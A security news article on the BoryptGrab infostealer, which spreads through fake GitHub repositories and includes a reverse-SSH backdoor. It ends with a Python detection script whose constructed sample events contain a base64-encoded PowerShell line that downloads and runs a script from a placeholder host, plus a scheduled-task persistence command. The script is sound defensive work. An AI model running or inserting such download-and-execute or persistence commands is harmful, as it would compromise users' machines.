A newly identified malware known as BoryptGrab is rapidly spreading across Windows platforms. It utilizes fake GitHub repositories to deceive users into downloading what seem to be popular free software tools.
How BoryptGrab Operates
The campaign, active since April 2025, cleverly manipulates search engines to present these malicious repositories as legitimate, leading users into an intricate infection chain. This process ultimately results in the theft of sensitive information, which is covertly sent to the attackers.
A significant number of GitHub repositories have been established by the threat actors, each posing as a download page for various tools, including game cheats and productivity applications. These repositories use SEO-optimized keywords to rank highly in search results, appearing alongside authentic results.
Uncovering the Infection Chain
Upon clicking download links in these repositories, users undergo multiple redirections, involving base64-encoded and AES-encrypted URLs, before landing on a deceptive download page that distributes a malicious ZIP file. Trend Micro analysts traced the BoryptGrab campaign while investigating suspicious ZIP files, linking the infection chain back to these GitHub-hosted pages.
The research revealed a complex operation involving various payload variants, tagged with build names like “Shrek” and “CryptoByte.” This indicates a well-organized and ongoing threat. BoryptGrab is capable of extracting credentials and cookies from popular browsers like Chrome and Firefox, and targets over 30 cryptocurrency wallet applications, including Exodus and Ledger Live.
Potential Threats and Precautions
A notable aspect of this campaign is the inclusion of TunnesshClient, a backdoor that establishes a reverse SSH tunnel to the attacker’s server, giving the operators remote command execution and file transfer on the infected host. Russian-language comments in the code and IP addresses linked to Russia point to Russian-speaking operators, though language strings and hosting choices are only weak attribution signals.
The infection starts when a victim follows a download link on one of these fake GitHub pages: after the redirection chain, a landing page serves a malicious ZIP file tailored to that visit. The payload inside the ZIP takes several forms, including executables that decrypt an embedded payload at runtime and VBS scripts that launch obfuscated PowerShell commands.
To minimize risk, users should download software only from verified sources and avoid free tools offered by unfamiliar GitHub repositories; a high search ranking is not a trust signal. Security teams should monitor for activity consistent with this chain, such as script hosts spawning PowerShell, unexpected scheduled tasks, and unusual outbound traffic, including SSH connections from hosts or processes that have no reason to open them. Keeping security tools up to date and verifying software sources are vital steps in reducing exposure to such threats.
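As an added illustration of those monitoring points, the script below is example code written for this article and is not Trend Micro's tooling or the malware's own code. It runs three detection rules over a constructed, simplified set of process and network events that mirror the chain described above (VBS launching encoded PowerShell, a scheduled task pointing into a user-writable directory, and SSH-port egress from a binary that is not a known SSH client). The event field names, the hypothetical download URL, and the choice of port 22 for the reverse tunnel are all assumptions; the article does not state which port TunnesshClient uses, so the port allowlist should be tuned to your environment.

```python
import base64
import binascii
import re

# Constructed sample: the PowerShell a VBS stage might run, encoded the way
# powershell.exe -EncodedCommand expects (base64 over UTF-16LE). The URL is
# hypothetical and does not resolve.
_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"
ENCODED_STAGE2 = base64.b64encode(_STAGE2.encode("utf-16-le")).decode("ascii")

# Constructed events, not captured from a real infection. Field names are
# a simplification of what an EDR or Sysmon pipeline would provide.
SAMPLE_EVENTS = [
    {"type": "process", "pid": 4011, "parent": "explorer.exe", "image": "wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\u\Downloads\Setup\install.vbs"'},
    {"type": "process", "pid": 4012, "parent": "wscript.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + ENCODED_STAGE2},
    {"type": "process", "pid": 4013, "parent": "powershell.exe", "image": "schtasks.exe",
     "cmdline": 'schtasks.exe /create /sc minute /mo 5 /tn "Updater" '
                '/tr "C:\\Users\\u\\AppData\\Roaming\\svc.exe"'},
    {"type": "network", "pid": 4020, "image": "svc.exe", "direction": "out",
     "dst_ip": "203.0.113.10", "dst_port": 22},
    {"type": "process", "pid": 5000, "parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": "notepad.exe"},
    {"type": "network", "pid": 5001, "image": "ssh.exe", "direction": "out",
     "dst_ip": "198.51.100.5", "dst_port": 22},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
KNOWN_SSH_CLIENTS = {"ssh.exe", "putty.exe", "plink.exe", "kitty.exe"}  # tune per environment
USER_WRITABLE = re.compile(r"\\(appdata|temp|tmp|downloads|programdata)\\", re.I)
DOWNLOAD_CUES = ("downloadstring", "invoke-webrequest", "iwr ", "iex",
                 "frombase64string", "bitstransfer")
# -e, -ec, -enc and -encodedcommand are all accepted by powershell.exe.
_ENC_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
_TR_ARG = re.compile(r'/tr\s+(?:"([^"]*)"|(\S+))', re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext of a PowerShell -EncodedCommand argument, or None."""
    m = _ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def triage(events):
    """Apply three rules matching the behaviours the article describes.

    Returns a list of alert dicts in event order.
    """
    alerts = []
    for ev in events:
        if ev["type"] == "process":
            image, parent, cmd = ev["image"].lower(), ev["parent"].lower(), ev["cmdline"]
            # Rule 1: a script host (VBS/JS/HTA) spawning PowerShell; decode the
            # command so the analyst sees the real payload, and note download cues.
            if image == "powershell.exe" and parent in SCRIPT_HOSTS:
                decoded = decode_encoded_command(cmd)
                cues = [c for c in DOWNLOAD_CUES if decoded and c in decoded.lower()]
                alerts.append({"rule": "script_host_powershell", "pid": ev["pid"],
                               "detail": decoded or cmd, "cues": cues})
            # Rule 2: scheduled task whose action lives in a user-writable directory.
            elif image == "schtasks.exe" and "/create" in cmd.lower():
                m = _TR_ARG.search(cmd)
                target = (m.group(1) or m.group(2)) if m else ""
                if USER_WRITABLE.search(target):
                    alerts.append({"rule": "schtasks_user_writable", "pid": ev["pid"],
                                   "detail": target, "cues": []})
        elif ev["type"] == "network" and ev["direction"] == "out":
            # Rule 3: SSH-port egress from a binary that is not a known SSH client
            # (a reverse tunnel may use any port; 22 is an assumption for the sample).
            if ev["dst_port"] == 22 and ev["image"].lower() not in KNOWN_SSH_CLIENTS:
                alerts.append({"rule": "ssh_egress_unknown_client", "pid": ev["pid"],
                               "detail": f'{ev["image"]} -> {ev["dst_ip"]}:22', "cues": []})
    return alerts


if __name__ == "__main__":
    for a in triage(SAMPLE_EVENTS):
        print(a["rule"], a["pid"], a["detail"], a["cues"])
```

The encoded-command decoder is the piece worth keeping even if the other rules are swapped for your own EDR queries: PowerShell's -EncodedCommand is base64 over UTF-16LE, not UTF-8, so a generic base64 decoder will show interleaved null bytes instead of the script.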
